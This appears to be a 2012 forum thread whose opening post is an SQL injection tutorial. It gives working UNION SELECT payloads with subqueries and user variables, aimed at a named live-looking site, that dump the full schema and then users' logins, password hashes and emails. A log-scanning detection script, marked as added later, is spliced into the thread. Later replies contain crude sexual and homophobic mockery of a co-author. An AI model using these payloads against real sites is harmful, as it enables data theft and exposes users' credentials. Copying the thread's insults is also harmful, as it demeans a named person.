ionut97 Posted December 29, 2012

by ???Dan & DenJacker

What we will be doing is using nested select statements (subqueries), along with our own variable, to bypass the 1024 character limit of group_concat. If you're new to SQL, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests.

First off, the database/table/columns:

(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))x)

PoC:

http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+

Of course, if magic_quotes is enabled you would need to bypass using quotations by using hex values, or using the char() function. View the source, and we see every single database/table/column accessible.

Now, to grab information from the columns:

(select (@) from (select (@:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns))))x)

PoC:

http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+

Source: TUTORIAL : [All DB In [1] Request]
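A detection-side example added here, not part of the original post: it scans access-log request lines for the combination of markers this payload shape depends on (UNION SELECT, a MySQL user-variable assignment with := inside a subquery, concat() into that variable, information_schema references, 0x hex literals), which is what a WAF rule or a log review would key on. The log lines, the host and the two-marker threshold are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Markers characteristic of the subquery/user-variable extraction technique.
# Any one alone is weak evidence (0x literals and UNION appear in normal
# traffic); two or more together in a single parameter is the real signal.
MARKERS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "user_var_assign": re.compile(r"@\w*\s*:=", re.I),          # @:=  or @x:=
    "concat_into_var": re.compile(r":=\s*concat\s*\(", re.I),   # @:=concat(
    "info_schema": re.compile(r"\binformation_schema\s*\.\s*\w+", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),     # 0x00, 0x3a ...
}

def normalise(value: str) -> str:
    """Decode once more (catches double-encoding), drop /* */ comments, squash whitespace."""
    v = unquote_plus(value)
    v = re.sub(r"/\*.*?\*/", " ", v, flags=re.S)
    return re.sub(r"\s+", " ", v)

def score_request(url: str) -> dict:
    """Return the marker names hit by any query parameter of a request URL."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    hits = set()
    for _name, raw in params:
        text = normalise(raw)
        hits.update(m for m, rx in MARKERS.items() if rx.search(text))
    return {"url": url, "hits": sorted(hits), "suspicious": len(hits) >= 2}

def scan_log(lines):
    """Return (url, hits) for every Common Log Format line whose URL trips >= 2 markers."""
    flagged = []
    for line in lines:
        m = re.search(r'"(?:GET|POST)\s+(\S+)\s+HTTP/', line)
        if not m:
            continue
        result = score_request(m.group(1))
        if result["suspicious"]:
            flagged.append((result["url"], result["hits"]))
    return flagged

# Constructed sample log: three benign requests and one carrying the payload shape.
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Dec/2012:10:00:01 +0000] "GET /work.php?id=181 HTTP/1.1" 200 4120',
    '198.51.100.7 - - [29/Dec/2012:10:00:02 +0000] "GET /search.php?q=contact%40example.com HTTP/1.1" 200 900',
    '198.51.100.7 - - [29/Dec/2012:10:00:03 +0000] "GET /work.php?id=0x1f HTTP/1.1" 200 4120',
    '198.51.100.7 - - [29/Dec/2012:10:00:04 +0000] "GET /work.php?id=-181%27%20UNION%20SELECT%201,2,3,4,5,(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(table_schema>=@)and(@)in(@:=concat(@,0x0a,table_name))))a)--+ HTTP/1.1" 200 9873',
]

if __name__ == "__main__":
    for url, hits in scan_log(SAMPLE_LOG):
        print(f"FLAGGED {url[:60]}... markers={hits}")
```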
denjacker Posted January 2, 2013

???Dan is gay !
boogy Posted January 2, 2013

Really nice
Andrei Posted January 2, 2013

If I remember correctly, denjacker presented the syntax at the first DefCamp. Am I wrong?
denjacker Posted January 2, 2013 (edited)

> If I remember correctly, denjacker presented the syntax at the first DefCamp. Am I wrong?

http://www.slideshare.net/DefCamp/advanced-data-mining-in-my-sql-injections-using-subqueries-and-custom-variables

The slides also include the benchmark variant .. the one the rats over on HF still have no clue about. If someone posts it there, dozens of tutorials appear right away and they all puff up claiming they knew it since they were little.

Screw HF, SCREW 8===> ???Dan

Edited January 2, 2013 by denjacker
Andrei Posted January 2, 2013

Who the fuck is Dan?!

Later edit: Send a buzz when you're online.
denjacker Posted January 2, 2013

This is ???Dan. He touches himself at night !
Andrei Posted January 2, 2013

It's good that you're at least mentioned among the authors, even though in reality the order should be reversed. Specimens like that have to be pushed to the front every now and then.